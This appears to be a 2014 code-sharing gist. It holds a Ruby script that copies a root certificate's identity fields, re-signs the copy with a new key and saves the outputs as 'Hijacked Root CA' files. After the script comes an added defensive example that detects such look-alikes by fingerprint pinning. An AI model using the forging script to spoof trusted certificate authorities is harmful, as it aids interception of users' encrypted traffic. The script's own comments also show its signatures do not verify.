@gdisneyleugers
Created March 28, 2014 03:40
require 'rubygems'
require 'openssl'
puts "Warning this tool only works with DER encoded certificates"
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC)
ctx = OpenSSL::SSL::SSLContext.new
public_key = key.public_key
raw = File.read "root.cer"
cert = OpenSSL::X509::Certificate.new raw
cert.not_before = Time.now
# Valid for four years from now (365-day years, expressed in seconds).
cert.not_after = Time.now + 4 * 365 * 24 * 60 * 60
cert.version = 2
ef = OpenSSL::X509::ExtensionFactory.new
ef.issuer_certificate = OpenSSL::X509::Certificate.new raw
cert.subject = ef.issuer_certificate.subject
ef.subject_certificate = ef.issuer_certificate
cert.issuer = ef.issuer_certificate.subject
cert.serial = ef.issuer_certificate.serial
ctx.key = ef.issuer_certificate.public_key
cert.public_key = ef.issuer_certificate.public_key
ctx.cert = ef.issuer_certificate
cert.add_extension(ef.create_extension("basicConstraints","CA:true",true))
cert.add_extension(ef.create_extension("keyUsage","keyCertSign, cRLSign", true))
cert.add_extension(ef.create_extension("subjectKeyIdentifier","hash", false))
cert.add_extension(ef.create_extension("authorityKeyIdentifier","keyid:always",false))
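puts "Signing Certificate"
# Both objects keep the public key from root.cer but are signed with the
# freshly generated key, so neither signature verifies against the
# certificate's own embedded public key.
skey = cert.sign(key, OpenSSL::Digest::SHA256.new)
root = ef.issuer_certificate.sign(key, OpenSSL::Digest::SHA256.new)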
filer = File.open("#{cert.serial}"".pub"".key", "w")
filer.syswrite("#{key.to_pem}")
file = File.open("#{cert.serial}"".pub"".pem", "w")
file.syswrite("#{skey.to_pem}")
files = File.open("#{cert.serial}"".crt", "w")
files.syswrite("#{root.to_pem}")
files = File.open("#{cert.serial}"".pem", "w")
files.syswrite("#{cert.to_pem}")
# Write the serial number to the .srl file.
filed = File.open("#{cert.serial}"".srl", "w")
filed.syswrite("#{cert.serial}")
puts "Hijacked Root CA saved #{cert.serial}.crt"
puts "Hijacked Secondary CA saved #{cert.serial}.pem"
puts "Hijacked Root CA key saved #{cert.serial}.pub.key"
printf "Verifying Keys: "
puts root.verify(key)
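
The script above emits certificates that copy the subject, issuer, serial and public key of `root.cer` but carry a signature made with a newly generated key. The following is an added example, not part of the original gist, showing how a verifier can tell such a look-alike from the pinned root; the function names, subjects and serials are constructed for illustration.

```ruby
require 'openssl'

SHA256 = -> { OpenSSL::Digest.new('SHA256') }

# Build a self-signed CA certificate. All values passed in are constructed samples.
def make_root(key, subject, serial)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = serial
  cert.subject = cert.issuer = OpenSSL::X509::Name.parse(subject)
  cert.public_key = key.public_key
  cert.not_before = Time.now
  cert.not_after = Time.now + 3600
  cert.sign(key, SHA256.call)
end

# SHA-256 over the full DER encoding, signature included.
def fingerprint(cert)
  SHA256.call.hexdigest(cert.to_der)
end

# Classify a candidate certificate against a pinned trusted root.
def classify(trusted, candidate)
  return :pinned_match if fingerprint(trusted) == fingerprint(candidate)
  same_name = trusted.subject.cmp(candidate.subject).zero?
  return :unrelated unless same_name && trusted.serial == candidate.serial
  # Same subject and serial but different bytes: a look-alike of the pinned root.
  candidate.verify(candidate.public_key) ? :lookalike_own_key : :lookalike_bad_signature
end

# Constructed demo: the pinned root, a re-signed copy of it (the shape the
# script on this page produces), a same-name root with its own key, and an
# unrelated root.
def demo
  root_key  = OpenSSL::PKey::RSA.new(2048)
  other_key = OpenSSL::PKey::RSA.new(2048)
  name = '/CN=Example Test Root' # hypothetical subject
  root = make_root(root_key, name, 4096)
  resigned = OpenSSL::X509::Certificate.new(root.to_der).sign(other_key, SHA256.call)
  same_name = make_root(other_key, name, 4096)
  other = make_root(other_key, '/CN=Some Other Root', 7)
  { root: classify(root, root), resigned: classify(root, resigned),
    same_name: classify(root, same_name), other: classify(root, other) }
end

p demo if $PROGRAM_NAME == __FILE__
```

The `:lookalike_own_key` case is why matching on subject and serial, or checking only that a self-signature verifies, is not enough: trust decisions should compare the full fingerprint against the pinned value.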